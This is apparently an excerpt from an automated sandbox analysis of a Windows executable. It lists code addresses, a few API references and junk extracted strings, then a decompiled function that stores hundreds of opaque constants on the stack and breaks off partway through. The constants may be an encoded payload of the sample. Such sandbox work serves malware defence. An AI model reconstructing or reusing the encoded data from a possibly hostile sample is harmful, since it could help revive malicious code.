0x00407a1c
0x00407a26
0x00407a30
0x00407a3a
0x00407a44
0x00407a4e
0x00407a58
0x00407a62
0x00407a6c
0x00407a76
0x00407a80
0x00407a8a
0x00407a94
0x00407a9e
0x00407aa8
0x00407ab2
0x00407abc
0x00407ac6
0x00407ad0
0x00407ada
0x00407ae4
0x00407aee
0x00407af8
0x00407b02
0x00407b0c
0x00407b16
0x00407b20
0x00407b2a
0x00407b34
0x00407b3e
0x00407b48
0x00407b52
0x00407b5c
0x00407b66
0x00407b70
0x00407b7a
0x00407b84
0x00407b8e
0x00407b98
0x00407ba2
0x00407bac
0x00407bb6
0x00407bc0
0x00407bca
0x00407bd4
0x00407bde
0x00407be8
0x00407bf2
0x00407bfc
0x00407c06
0x00407c10
0x00407c1a
0x00407c24
0x00407c2e
0x00407c38
0x00407c42
0x00407c4c
0x00407c56
0x00407c60
0x00407c6a
0x00407c74
0x00407c7e
0x00407c88
0x00407c92
0x00407c9c
0x00407ca6
0x00407cb0
0x00407cba
0x00407cc4
0x00407cce
0x00407cd8
0x00407ce2
0x00407cec
0x00407cf6
0x00407d00
0x00407d0a
0x00407d14
0x00407d1e
0x00407d28
0x00407d32
0x00407d3c
0x00407d46
0x00407d50
0x00407d5a
0x00407d64
0x00407d6e
0x00407d78
0x00407d82
0x00407d8c
0x00407d96
0x00407da0
0x00407daa
0x00407db4
0x00407dbe
0x00407dc8
0x00407dd2
0x00407ddc
0x00407de6
0x00407df0
0x00407dfa
0x00407e04
0x00407e0e
0x00407e18
0x00407e22
0x00407e2c
0x00407e36
0x00407e40
0x00407e4a
0x00407e54
0x00407e5e
0x00407e68
0x00407e72
0x00407e7c
0x00407e86
0x00407e90
0x00407e9a
0x00407ea4
0x00407eae
0x00407eb8
0x00407ec2
0x00407ecc
0x00407ed6
0x00407ee0
0x00407eea
0x00407ef4
0x00407efe
0x00407f08
0x00407f12
0x00407f1c
0x00407f26
0x00407f30
0x00407f3a
0x00407f44
0x00407f4e
0x00407f58
0x00407f62
0x00407f6c
0x00407f76
0x00407f80
0x00407f8a
0x00407f94
0x00407f9e
0x00407fa8
0x00407fb2
0x00407fbc
0x00407fc6
0x00407fd0
0x00407fda
0x00407fe4
0x00407fee
0x00407ff8
0x00408002
0x0040800c
0x00408016
0x00408020
0x0040802a
0x00408034
0x0040803e
0x00408048
0x00408052
0x0040805c
0x00408066
0x00408070
0x0040807a
0x00408084
0x0040808e
0x00408098
0x004080a2
0x004080ac
0x004080b6
0x004080c0
0x004080ca
0x004080d4
0x004080de
0x004080e8
0x004080f2
0x004080fc
0x00408106
0x00408110
0x0040811a
0x00408124
0x0040812e
0x00408138
0x0040814c
0x0040815b
0x00408165
0x0040816f
0x00408179
0x00408183
0x0040818d
0x00408197
0x004081a1
0x004081ab
0x004081b5
0x004081bf
0x004081c6
0x004081cd
0x004081d4
0x004081db
0x004081e2
0x004081e9
0x004081f0
0x004081f7
0x004081fe
0x00408205
0x0040820c
0x00408213
0x0040821a
0x00408221
0x00408228
0x0040822f
0x00408236
0x0040823d
0x00408244
0x0040824b
0x00408252
0x00408259
0x00408260
0x00408267
0x0040826e
0x00408275
0x0040827c
0x00408283
0x0040828a
0x00408291
0x00408298
0x004082a7
0x004082b3
0x004082bf
0x004082c5
0x004082cb
0x004082ce
0x004082d6
0x004082db
0x004082dc
0x004082dd
0x004082de
0x004082df
0x004082e0
0x004082e1
0x004082e2
0x004082e3
0x004082e4
0x004082f6
0x004082d0
0x004082d0
0x004082d5
0x004082d5

APIs

LoadLibraryW.KERNEL32(00000000), ref: 004082AA
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004082B8
HeapFree.KERNEL32(00000000), ref: 004082BF

Strings

>HSF, xrefs: 0040824B
fsI, xrefs: 00407620
V@%, xrefs: 004079EA
rE,S, xrefs: 0040828A
;> , xrefs: 00408165
Xe:, xrefs: 00407A44
, ?|, xrefs: 00407594
S#w7, xrefs: 00407210
An\;, xrefs: 00407E54
xZ}, xrefs: 004080C0
,W<B, xrefs: 004079FE
P&A, xrefs: 00408156
P+"V, xrefs: 0040747C
7r)P, xrefs: 00408066
Mr-J, xrefs: 00407184
]vFu, xrefs: 004075E4
_5S, xrefs: 00407378
ZGK~, xrefs: 0040794A
*U I, xrefs: 00407B20
Vy6, xrefs: 00407E68

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$FreeLibraryLoadProcess
String ID: Xe:$*U I$, ?|$,W<B$7r)P$>HSF$An\;$Mr-J$P&A$P+"V$S#w7$Vy6$ZGK~$]vFu$_5S$fsI$rE,S$xZ}$;> $V@%
API String ID: 872250060-171546472
Opcode ID: 72483e9caebf6f9293bfc67081063e826f4fb20660eef1468c24679b5d5a22a1
Instruction ID: 8c77fbe8299b47ea9c21a6575a64311e8376028a6fe43ff8061cba3b15a70e69
Opcode Fuzzy Hash: 72483e9caebf6f9293bfc67081063e826f4fb20660eef1468c24679b5d5a22a1
Instruction Fuzzy Hash: AF8294F48467698FDB618F429E8468EBA75BB52305F6086C8C25D3B214CB750BD2CF89

Uniqueness

Uniqueness Score: 100.00%

Function 004095BA, Relevance: 26.6, APIs: 3, Strings: 12, Instructions: 362
memorylibraryUNIQUE

C-Code - Quality: 96%

			E004095BA(void* __esi, void* __eflags) {
				int _t347;
				void* _t349;
				void* _t354;
				void* _t356;
				void* _t357;
				void* _t358;

				 *((intOrPtr*)(_t358 - 0x558)) = 0x5983dc83;
				 *((intOrPtr*)(_t358 - 0x554)) = 0x6205147;
				 *((intOrPtr*)(_t358 - 0x550)) = 0x9c52694a;
				 *((intOrPtr*)(_t358 - 0x54c)) = 0xea11a8ca;
				 *((intOrPtr*)(_t358 - 0x548)) = 0xf4e832d5;
				 *((intOrPtr*)(_t358 - 0x544)) = 0xb42439a8;
				 *((intOrPtr*)(_t358 - 0x540)) = 0x86c85539;
				 *((intOrPtr*)(_t358 - 0x53c)) = 0xff8e5c81;
				 *((intOrPtr*)(_t358 - 0x538)) = 0x3fb35c90;
				 *((intOrPtr*)(_t358 - 0x534)) = 0x57b16f81;
				 *((intOrPtr*)(_t358 - 0x530)) = 0x37ce5ecd;
				 *((intOrPtr*)(_t358 - 0x52c)) = 0xc6349551;
				 *((intOrPtr*)(_t358 - 0x528)) = 0xe3cb20bc;
				 *((intOrPtr*)(_t358 - 0x524)) = 0xf50b0380;
				 *((intOrPtr*)(_t358 - 0x520)) = 0xec73c88e;
				 *((intOrPtr*)(_t358 - 0x51c)) = 0x234399d1;
				 *((intOrPtr*)(_t358 - 0x518)) = 0x17cbc3b;
				 *((intOrPtr*)(_t358 - 0x514)) = 0x810ab82a;
				 *((intOrPtr*)(_t358 - 0x510)) = 0x5c585a3e;
				 *((intOrPtr*)(_t358 - 0x50c)) = 0x95eb5a86;
				 *((intOrPtr*)(_t358 - 0x508)) = 0xbcf8e1f;
				 *((intOrPtr*)(_t358 - 0x504)) = 0x40edeb7e;
				 *((intOrPtr*)(_t358 - 0x500)) = 0xea6e92a7;
				 *((intOrPtr*)(_t358 - 0x4fc)) = 0xd576636c;
				 *((intOrPtr*)(_t358 - 0x4f8)) = 0x41cee1bc;
				 *((intOrPtr*)(_t358 - 0x4f4)) = 0x37250fc;
				 *((intOrPtr*)(_t358 - 0x4f0)) = 0x4e30bf56;
				 *((intOrPtr*)(_t358 - 0x4ec)) = 0x3decacab;
				 *((intOrPtr*)(_t358 - 0x4e8)) = 0xefe66d4c;
				 *((intOrPtr*)(_t358 - 0x4e4)) = 0x94023881;
				 *((intOrPtr*)(_t358 - 0x4e0)) = 0xc560eac;
				 *((intOrPtr*)(_t358 - 0x4dc)) = 0xc528d1f9;
				 *((intOrPtr*)(_t358 - 0x4d8)) = 0x1f6e1575;
				 *((intOrPtr*)(_t358 - 0x4d4)) = 0xaec179f;
				 *((intOrPtr*)(_t358 - 0x4d0)) = 0x30985a0c;
				 *((intOrPtr*)(_t358 - 0x4cc)) = 0x48e5158f;
				 *((intOrPtr*)(_t358 - 0x4c8)) = 0xf5ad63f4;
				 *((intOrPtr*)(_t358 - 0x4c4)) = 0x1ad9829c;
				 *((intOrPtr*)(_t358 - 0x4c0)) = 0x97309805;
				 *((intOrPtr*)(_t358 - 0x4bc)) = 0xd12beb8;
				 *((intOrPtr*)(_t358 - 0x4b8)) = 0xc0b96d24;
				 *((intOrPtr*)(_t358 - 0x4b4)) = 0x1d320e17;
				 *((intOrPtr*)(_t358 - 0x4b0)) = 0x41be0792;
				 *((intOrPtr*)(_t358 - 0x4ac)) = 0x7047ade7;
				 *((intOrPtr*)(_t358 - 0x4a8)) = 0x1759681;
				 *((intOrPtr*)(_t358 - 0x4a4)) = 0xef64f19b;
				 *((intOrPtr*)(_t358 - 0x4a0)) = 0xf69756ef;
				 *((intOrPtr*)(_t358 - 0x49c)) = 0x848cfa8b;
				 *((intOrPtr*)(_t358 - 0x498)) = 0xe24a2799;
				 *((intOrPtr*)(_t358 - 0x494)) = 0x21bab94d;
				 *((intOrPtr*)(_t358 - 0x490)) = 0xf9cffe40;
				 *((intOrPtr*)(_t358 - 0x48c)) = 0x121baed7;
				 *((intOrPtr*)(_t358 - 0x488)) = 0xecdca60c;
				 *((intOrPtr*)(_t358 - 0x484)) = 0x9ade6e2c;
				 *((intOrPtr*)(_t358 - 0x480)) = 0x8d0df929;
				 *((intOrPtr*)(_t358 - 0x47c)) = 0xa3a42f5d;
				 *((intOrPtr*)(_t358 - 0x478)) = 0x2b6599;
				 *((intOrPtr*)(_t358 - 0x474)) = 0x8570bfb;
				 *((intOrPtr*)(_t358 - 0x470)) = 0xb1287738;
				 *((intOrPtr*)(_t358 - 0x46c)) = 0xaab6ccff;
				 *((intOrPtr*)(_t358 - 0x468)) = 0x1e5133f6;
				 *((intOrPtr*)(_t358 - 0x464)) = 0xad65e96a;
				 *((intOrPtr*)(_t358 - 0x460)) = 0xb82055dd;
				 *((intOrPtr*)(_t358 - 0x45c)) = 0x3f8794c5;
				 *((intOrPtr*)(_t358 - 0x458)) = 0x4257c01a;
				 *((intOrPtr*)(_t358 - 0x454)) = 0xd574423b;
				 *((intOrPtr*)(_t358 - 0x450)) = 0xd390a41e;
				 *((intOrPtr*)(_t358 - 0x44c)) = 0xb5b6efd7;
				 *((intOrPtr*)(_t358 - 0x448)) = 0x55f35975;
				 *((intOrPtr*)(_t358 - 0x444)) = 0x5d07ad64;
				 *((intOrPtr*)(_t358 - 0x440)) = 0x69ef2174;
				 *((intOrPtr*)(_t358 - 0x43c)) = 0xca43e0cc;
				 *((intOrPtr*)(_t358 - 0x438)) = 0x9d2d59d9;
				 *((intOrPtr*)(_t358 - 0x434)) = 0x76e645a5;
				 *((intOrPtr*)(_t358 - 0x430)) = 0xc6f3628e;
				 *((intOrPtr*)(_t358 - 0x42c)) = 0x568dc342;
				 *((intOrPtr*)(_t358 - 0x428)) = 0x28f8c939;
				 *((intOrPtr*)(_t358 - 0x424)) = 0x52b6dd6c;
				 *((intOrPtr*)(_t358 - 0x420)) = 0x9ce342d0;
				 *((intOrPtr*)(_t358 - 0x41c)) = 0x78061332;
				 *((intOrPtr*)(_t358 - 0x418)) = 0x72dffa0c;
				 *((intOrPtr*)(_t358 - 0x414)) = 0x4c7a188b;
				 *((intOrPtr*)(_t358 - 0x410)) = 0x1056a024;
				 *((intOrPtr*)(_t358 - 0x40c)) = 0x1fd121d0;
				 *((intOrPtr*)(_t358 - 0x408)) = 0x7a29a4a6;
				 *((intOrPtr*)(_t358 - 0x404)) = 0x5616e816;
				 *((intOrPtr*)(_t358 - 0x400)) = 0xc8a7c690;
				 *((intOrPtr*)(_t358 - 0x3fc)) = 0x634496e9;
				 *((intOrPtr*)(_t358 - 0x3f8)) = 0x1aeda1c1;
				 *((intOrPtr*)(_t358 - 0x3f4)) = 0xc77be79e;
				 *((intOrPtr*)(_t358 - 0x3f0)) = 0xc10d7c15;
				 *((intOrPtr*)(_t358 - 0x3ec)) = 0x678d53e;
				 *((intOrPtr*)(_t358 - 0x3e8)) = 0xe84f9b4d;
				 *((intOrPtr*)(_t358 - 0x3e4)) = 0x2d8e37df;
				 *((intOrPtr*)(_t358 - 0x3e0)) = 0x1c9f512c;
				 *((intOrPtr*)(_t358 - 0x3dc)) = 0x721fe9e4;
				 *((intOrPtr*)(_t358 - 0x3d8)) = 0x2f9e4915;
				 *((intOrPtr*)(_t358 - 0x3d4)) = 0xcb82fd6;
				 *((intOrPtr*)(_t358 - 0x3d0)) = 0x8733750f;
				 *((intOrPtr*)(_t358 - 0x3cc)) = 0x5a96da0b;
				 *((intOrPtr*)(_t358 - 0x3c8)) = 0xfb61b19;
				 *((intOrPtr*)(_t358 - 0x3c4)) = 0xf82ecf56;
				 *((intOrPtr*)(_t358 - 0x3c0)) = 0x5047e2c1;
				 *((intOrPtr*)(_t358 - 0x3bc)) = 0x83c7f9b1;
				 *((intOrPtr*)(_t358 - 0x3b8)) = 0xeb38ecc1;
				 *((intOrPtr*)(_t358 - 0x3b4)) = 0xb540920d;
				 *((intOrPtr*)(_t358 - 0x3b0)) = 0x8a59e6a5;
				 *((intOrPtr*)(_t358 - 0x3ac)) = 0x48ce5054;
				 *((intOrPtr*)(_t358 - 0x3a8)) = 0xb077f7c5;
				 *((intOrPtr*)(_t358 - 0x3a4)) = 0x44b285c2;
				 *((intOrPtr*)(_t358 - 0x3a0)) = 0xb82b7cd6;
				 *((intOrPtr*)(_t358 - 0x39c)) = 0xbac7d26e;
				 *((intOrPtr*)(_t358 - 0x398)) = 0x4fa12047;
				 *((intOrPtr*)(_t358 - 0x394)) = 0x5b1b2387;
				 *((intOrPtr*)(_t358 - 0x390)) = 0x33d23848;
				 *((intOrPtr*)(_t358 - 0x38c)) = 0xc6de4f8;
				 *((intOrPtr*)(_t358 - 0x388)) = 0x803a506;
				 *((intOrPtr*)(_t358 - 0x384)) = 0xa7b6287c;
				 *((intOrPtr*)(_t358 - 0x380)) = 0xd070df9f;
				 *((intOrPtr*)(_t358 - 0x37c)) = 0xcbc4aeb8;
				 *((intOrPtr*)(_t358 - 0x378)) = 0xe185d25e;
				 *((intOrPtr*)(_t358 - 0x374)) = 0xa908665f;
				 *((intOrPtr*)(_t358 - 0x370)) = 0x879d8154;
				 *((intOrPtr*)(_t358 - 0x36c)) = 0xf860ba1c;
				 *((intOrPtr*)(_t358 - 0x368)) = 0x800d30f6;
				 *((intOrPtr*)(_t358 - 0x364)) = 0xefe65c19;
				 *((intOrPtr*)(_t358 - 0x360)) = 0xd2639963;
				 *((intOrPtr*)(_t358 - 0x35c)) = 0x120dd8b4;
				 *((intOrPtr*)(_t358 - 0x358)) = 0xed0eef0f;
				 *((intOrPtr*)(_t358 - 0x354)) = 0x6fe63af;
				 *((intOrPtr*)(_t358 - 0x350)) = 0x9e1c0c05;
				 *((intOrPtr*)(_t358 - 0x34c)) = 0x9714819b;
				 *((intOrPtr*)(_t358 - 0x348)) = 0x2cec068d;
				 *((intOrPtr*)(_t358 - 0x344)) = 0xbbb137b5;
				 *((intOrPtr*)(_t358 - 0x340)) = 0xe4cbb375;
				 *((intOrPtr*)(_t358 - 0x33c)) = 0xbfb34f78;
				 *((intOrPtr*)(_t358 - 0x338)) = 0x4e068179;
				 *((intOrPtr*)(_t358 - 0x334)) = 0xc0113683;
				 *((intOrPtr*)(_t358 - 0x330)) = 0xf9737f0c;
				 *((intOrPtr*)(_t358 - 0x32c)) = 0x55479d02;
				 *((intOrPtr*)(_t358 - 0x328)) = 0xb0d9adf6;
				 *((intOrPtr*)(_t358 - 0x324)) = 0xb7c3d6cc;
				 *((intOrPtr*)(_t358 - 0x320)) = 0xc0651536;
				 *((intOrPtr*)(_t358 - 0x31c)) = 0xeb7440d0;
				 *((intOrPtr*)(_t358 - 0x318)) = 0x7ad80d80;
				 *((intOrPtr*)(_t358 - 0x314)) = 0xe57fce41;
				 *((intOrPtr*)(_t358 - 0x310)) = 0x17c661bc;
				 *((intOrPtr*)(_t358 - 0x30c)) = 0x34af2289;
				 *((intOrPtr*)(_t358 - 0x308)) = 0xdbc1a9f2;
				 *((intOrPtr*)(_t358 - 0x304)) = 0x32f7bfc1;
				 *((intOrPtr*)(_t358 - 0x300)) = 0x7c4e2bde;
				 *((intOrPtr*)(_t358 - 0x2fc)) = 0xacbd8e;
				 *((intOrPtr*)(_t358 - 0x2f8)) = 0xcb1d61b3;
				 *((intOrPtr*)(_t358 - 0x2f4)) = 0x20f0d8a0;
				 *((intOrPtr*)(_t358 - 0x2f0)) = 0x94ab3a5c;
				 *((intOrPtr*)(_t358 - 0x2ec)) = 0x761af5c4;
				 *((intOrPtr*)(_t358 - 0x2e8)) = 0x14ed8e98;
				 *((intOrPtr*)(_t358 - 0x2e4)) = 0xa831ad9c;
				 *((intOrPtr*)(_t358 - 0x2e0)) = 0xc524836e;
				 *((intOrPtr*)(_t358 - 0x2dc)) = 0xe6692724;
				 *((intOrPtr*)(_t358 - 0x2d8)) = 0x9844baa5;
				 *((intOrPtr*)(_t358 - 0x2d4)) = 0x973f621d;
				 *((intOrPtr*)(_t358 - 0x2d0)) = 0xa5eb5a04;
				 *((intOrPtr*)(_t358 - 0x2cc)) = 0xfa44655;
				 *((intOrPtr*)(_t358 - 0x2c8)) = 0xe8dfd2d9;
				 *((intOrPtr*)(_t358 - 0x2c4)) = 0xa62e4c35;
				 *((intOrPtr*)(_t358 - 0x2c0)) = 0xab1679b5;
				 *((intOrPtr*)(_t358 - 0x2bc)) = 0x386d3d14;
				 *((intOrPtr*)(_t358 - 0x2b8)) = 0x75779727;
				 *((intOrPtr*)(_t358 - 0x2b4)) = 0x37c7d964;
				 *((intOrPtr*)(_t358 - 0x2b0)) = 0xe728cfdd;
				 *((intOrPtr*)(_t358 - 0x2ac)) = 0x3f8d315a;
				 *((intOrPtr*)(_t358 - 0x2a8)) = 0xdbd039e4;
				 *((intOrPtr*)(_t358 - 0x2a4)) = 0xc25468b7;
				 *((intOrPtr*)(_t358 - 0x2a0)) = 0x7b1683d0;
				 *((intOrPtr*)(_t358 - 0x29c)) = 0xec462ef9;
				 *((intOrPtr*)(_t358 - 0x298)) = 0x879af722;
				 *((intOrPtr*)(_t358 - 0x294)) = 0xcf8ef675;
				 *((intOrPtr*)(_t358 - 0x290)) = 0xa2ee51c4;
				 *((intOrPtr*)(_t358 - 0x28c)) = 0xc5acb6f9;
				 *((intOrPtr*)(_t358 - 0x288)) = 0x7b5acd7f;
				 *((intOrPtr*)(_t358 - 0x284)) = 0xbb184437;
				 *((intOrPtr*)(_t358 - 0x280)) = 0x433db52b;
				 *((intOrPtr*)(_t358 - 0x27c)) = 0x483309bf;
				 *((intOrPtr*)(_t358 - 0x278)) = 0xcb574e95;
				 *((intOrPtr*)(_t358 - 0x274)) = 0x4d06b783;
				 *((intOrPtr*)(_t358 - 0x270)) = 0x169002a;
				 *((intOrPtr*)(_t358 - 0x26c)) = 0xf3972182;
				 *((intOrPtr*)(_t358 - 0x268)) = 0xd51e63d2;
				 *((intOrPtr*)(_t358 - 0x264)) = 0x152b5e59;
				 *((intOrPtr*)(_t358 - 0x260)) = 0x94263b0b;
				 *((intOrPtr*)(_t358 - 0x25c)) = 0xa7a0750d;
				 *((intOrPtr*)(_t358 - 0x258)) = 0x109d02c1;
				 *((intOrPtr*)(_t358 - 0x254)) = 0xb65bb0ca;
				 *((intOrPtr*)(_t358 - 0x250)) = 0x13be1387;
				 *((intOrPtr*)(_t358 - 0x24c)) = 0x56836ab5;
				 *((intOrPtr*)(_t358 - 0x248)) = 0x91f818c7;
				 *((intOrPtr*)(_t358 - 0x244)) = 0xe0b133d0;
				 *((intOrPtr*)(_t358 - 0x240)) = 0xebfc50a5;
				 *((intOrPtr*)(_t358 - 0x23c)) = 0xbb467c45;
				 *((intOrPtr*)(_t358 - 0x238)) = 0xc6903029;
				 *((intOrPtr*)(_t358 - 0x234)) = 0x56b9822f;
				 *((intOrPtr*)(_t358 - 0x230)) = 0x161f5c7b;
				 *((intOrPtr*)(_t358 - 0x22c)) = 0xf8c36310;
				 *((intOrPtr*)(_t358 - 0x228)) = 0xaf133463;
				 *((intOrPtr*)(_t358 - 0x224)) = 0x3d71ace0;
				 *((intOrPtr*)(_t358 - 0x220)) = 0x8b2373a4;
				 *((intOrPtr*)(_t358 - 0x21c)) = 0x3d117ec7;
				 *((intOrPtr*)(_t358 - 0x218)) = 0xa10f0c51;
				 *((intOrPtr*)(_t358 - 0x214)) = 0xf7b5c0cb;
				 *((intOrPtr*)(_t358 - 0x210)) = 0x9ad6e526;
				 *((intOrPtr*)(_t358 - 0x20c)) = 0xd88a71b2;
				 *((intOrPtr*)(_t358 - 0x208)) = 0xb03c6a99;
				 *((intOrPtr*)(_t358 - 0x204)) = 0x3dd23aef;
				 *((intOrPtr*)(_t358 - 0x200)) = 0x7bdcc9c1;
				 *((intOrPtr*)(_t358 - 0x1fc)) = 0xa57ff695;
				 *((intOrPtr*)(_t358 - 0x1f8)) = 0xe7039d77;
				 *((intOrPtr*)(_t358 - 0x1f4)) = 0x4dd87db5;
				 *((intOrPtr*)(_t358 - 0x1f0)) = 0x4c8c6b1;
				 *((intOrPtr*)(_t358 - 0x1ec)) = 0x59848d28;
				 *((intOrPtr*)(_t358 - 0x1e8)) = 0x63bce591;
				 *((intOrPtr*)(_t358 - 0x1e4)) = 0xa1335035;
				 *((intOrPtr*)(_t358 - 0x1e0)) = 0x429953cc;
				 *((intOrPtr*)(_t358 - 0x1dc)) = 0xc6040318;
				 *((intOrPtr*)(_t358 - 0x1d8)) = 0x2a09ac84;
				 *((intOrPtr*)(_t358 - 0x1d4)) = 0x4a741c06;
				 *((intOrPtr*)(_t358 - 0x1d0)) = 0x22f98e54;
				 *((intOrPtr*)(_t358 - 0x1cc)) = 0x22bec867;
				 *((intOrPtr*)(_t358 - 0x1c8)) = 0x6ceceaa6;
				 *((intOrPtr*)(_t358 - 0x1c4)) = 0x6d72a35;
				 *((intOrPtr*)(_t358 - 0x1c0)) = 0x7ca5fedf;
				 *((intOrPtr*)(_t358 - 0x1bc)) = 0x389da14e;
				 *((intOrPtr*)(_t358 - 0x1b8)) = 0x6ca50b8;
				 *((intOrPtr*)(_t358 - 0x1b4)) = 0x79e2fc7c;
				 *((intOrPtr*)(_t358 - 0x1b0)) = 0xb3b6bb19;
				 *((intOrPtr*)(_t358 - 0x1ac)) = 0x35241f06;
				 *((intOrPtr*)(_t358 - 0x1a8)) = 0x53258334;
				 *((intOrPtr*)(_t358 - 0x1a4)) = 0xe6525ced;
				 *((intOrPtr*)(_t358 - 0x1a0)) = 0x83c8d4c1;
				 *((intOrPtr*)(_t358 - 0x19c)) = 0xc9795e20;
				 *((intOrPtr*)(_t358 - 0x198)) = 0x71af8df4;
				 *((intOrPtr*)(_t358 - 0x194)) = 0xb4d15598;
				 *((intOrPtr*)(_t358 - 0x190)) = 0xfddf72c8;
				 *((intOrPtr*)(_t358 - 0x18c)) = 0xa21476ad;
				 *((intOrPtr*)(_t358 - 0x188)) = 0xe2b1c96a;
				 *((intOrPtr*)(_t358 - 0x184)) = 0xd148fe0d;
				 *((intOrPtr*)(_t358 - 0x180)) = 0x90a77abc;
				 *((intOrPtr*)(_t358 - 0x17c)) = 0xa8a1eb66;
				 *((intOrPtr*)(_t358 - 0x178)) = 0xe48df59c;
				 *((intOrPtr*)(_t358 - 0x174)) = 0xba7ef889;
				 *((intOrPtr*)(_t358 - 0x170)) = 0x48008e45;
				 *((intOrPtr*)(_t358 - 0x16c)) = 0x86a7f32c;
				 *((intOrPtr*)(_t358 - 0x168)) = 0x7cf8177d;
				 *((intOrPtr*)(_t358 - 0x164)) = 0xdcb09da6;
				 *((intOrPtr*)(_t358 - 0x160)) = 0xac7a15a3;
				 *((intOrPtr*)(_t358 - 0x15c)) = 0x46eb60b1;
				 *((intOrPtr*)(_t358 - 0x158)) = 0x44849955;
				 *((intOrPtr*)(_t358 - 0x154)) = 0x5d7bef1f;
				 *((intOrPtr*)(_t358 - 0x150)) = 0xb923a156;
				 *((intOrPtr*)(_t358 - 0x14c)) = 0xe44cbf6;
				 *((intOrPtr*)(_t358 - 0x148)) = 0xe6d10bbe;
				 *((intOrPtr*)(_t358 - 0x144)) = 0x4478a4e2;
				 *((intOrPtr*)(_t358 - 0x140)) = 0x90258dfc;
				 *((intOrPtr*)(_t358 - 0x13c)) = 0xc6aa7125;
				 *((intOrPtr*)(_t358 - 0x138)) = 0xf1006c86;
				 *((intOrPtr*)(_t358 - 0x134)) = 0xc1265961;
				 *((intOrPtr*)(_t358 - 0x130)) = 0xb236821;
				 *((intOrPtr*)(_t358 - 0x12c)) = 0x76dd8fc4;
				 *((intOrPtr*)(_t358 - 0x128)) = 0x752d6678;
				 *((intOrPtr*)(_t358 - 0x124)) = 0x639409ff;
				 *((intOrPtr*)(_t358 - 0x120)) = 0x1a62b510;
				 *((intOrPtr*)(_t358 - 0x11c)) = 0xfd3c9ac;
				 *((intOrPtr*)(_t358 - 0x118)) = 0xc16cd666;
				 *((intOrPtr*)(_t358 - 0x114)) = 0xe4950ce1;
				 *((intOrPtr*)(_t358 - 0x110)) = 0x7eb3993c;
				 *((intOrPtr*)(_t358 - 0x10c)) = 0xc7aff449;
				 *((intOrPtr*)(_t358 - 0x108)) = 0xb0812683;
				 *((intOrPtr*)(_t358 - 0x104)) = 0xb2ae48b7;
				 *((intOrPtr*)(_t358 - 0x100)) = 0x9676f439;
				 *((intOrPtr*)(_t358 - 0xfc)) = 0x2088b487;
				 *((intOrPtr*)(_t358 - 0xf8)) = 0xa3362ca0;
				 *((intOrPtr*)(_t358 - 0xf4)) = 0x74473bfd;
				 *((intOrPtr*)(_t358 - 0xf0)) = 0xfe8e0440;
				 *((intOrPtr*)(_t358 - 0xec)) = 0x40aec748;
				 *((intOrPtr*)(_t358 - 0xe8)) = 0x7fbf9a1f;
				 *((intOrPtr*)(_t358 - 0xe4)) = 0xfeda4ee7;
				 *((intOrPtr*)(_t358 - 0xe0)) = 0xeb7468a8;
				 *((intOrPtr*)(_t358 - 0xdc)) = 0x3a425629;
				 *((intOrPtr*)(_t358 - 0xd8)) = 0x3399c1e9;
				 *((intOrPtr*)(_t358 - 0xd4)) = 0x889a9a73;
				 *((intOrPtr*)(_t358 - 0xd0)) = 0xed30a909;
				 *((intOrPtr*)(_t358 - 0xcc)) = 0x59329f4c;
				 *((intOrPtr*)(_t358 - 0xc8)) = 0x9d0ba5c4;
				 *((intOrPtr*)(_t358 - 0xc4)) = 0x41ed77f6;
				 *((intOrPtr*)(_t358 - 0xc0)) = 0xc9445cc5;
				 *((intOrPtr*)(_t358 - 0xbc)) = 0x1f58c3e0;
				 *((intOrPtr*)(_t358 - 0xb8)) = 0x385797c3;
				 *((intOrPtr*)(_t358 - 0xb4)) = 0xb97a9bfc;
				 *((intOrPtr*)(_t358 - 0xb0)) = 0x9052c468;
				 *((intOrPtr*)(_t358 - 0xac)) = 0x3600198f;
				 *((intOrPtr*)(_t358 - 0xa8)) = 0xb14a32af;
				 *((intOrPtr*)(_t358 - 0xa4)) = 0x2f5f0dc8;
				 *((intOrPtr*)(_t358 - 0xa0)) = 0x1345611a;
				 *((intOrPtr*)(_t358 - 0x9c)) = 0xb91165af;
				 *((intOrPtr*)(_t358 - 0x98)) = 0x5ce54b83;
				 *((intOrPtr*)(_t358 - 0x94)) = 0x44720685;
				 *((intOrPtr*)(_t358 - 0x90)) = 0xf800f42f;
				 *((intOrPtr*)(_t358 - 0x8c)) = 0x89d9453f;
				 *((intOrPtr*)(_t358 - 0x88)) = 0x8506faaf;
				 *((intOrPtr*)(_t358 - 0x84)) = 0x32cd49b1;
				 *((intOrPtr*)(_t358 - 0x80)) = 0xded9ebd1;
				 *((intOrPtr*)(_t358 - 0x7c)) = 0xfd4b38f1;
				 *((intOrPtr*)(_t358 - 0x78)) = 0xec39f8a6;
				 *((intOrPtr*)(_t358 - 0x74)) = 0x67a4bcf3;
				 *((intOrPtr*)(_t358 - 0x70)) = 0x5a2ebad4;
				 *((intOrPtr*)(_t358 - 0x6c)) = 0x88d4162d;
				 *((intOrPtr*)(_t358 - 0x68)) = 0xa3cda3d3;
				 *((intOrPtr*)(_t358 - 0x64)) = 0x4c991f8f;
				 *((intOrPtr*)(_t358 - 0x60)) = 0x6e605f74;
				 *((intOrPtr*)(_t358 - 0x5c)) = 0x2eacd5ab;
				 *((intOrPtr*)(_t358 - 0x58)) = 0x10ca2833;
				 *((intOrPtr*)(_t358 - 0x54)) = 0xe5e50116;
				 *((intOrPtr*)(_t358 - 0x50)) = 0x7be3ca70;
				 *((intOrPtr*)(_t358 - 0x4c)) = 0x6b20cfbc;
				 *((intOrPtr*)(_t358 - 0x48)) = 0xd0f26335;
				 *((intOrPtr*)(_t358 - 0x44)) = 0x888a83c9;
				 *((intOrPtr*)(_t358 - 0x40)) = 0xafaced26;
				 *((intOrPtr*)(_t358 - 0x3c)) = 0x6c8a5637;
				 *((intOrPtr*)(_t358 - 0x38)) = 0xa231121f;
				 *((intOrPtr*)(_t358 - 0x34)) = 0xf3e163f5;
				 *((intOrPtr*)(_t358 - 0x30)) = 0x5825aa69;
				 *((intOrPtr*)(_t358 - 0x2c)) = 0x4a389261;
				 *((intOrPtr*)(_t358 - 0x28)) = 0xac196404;
				 *((intOrPtr*)(_t358 - 0x24)) = 0x3023c94e;
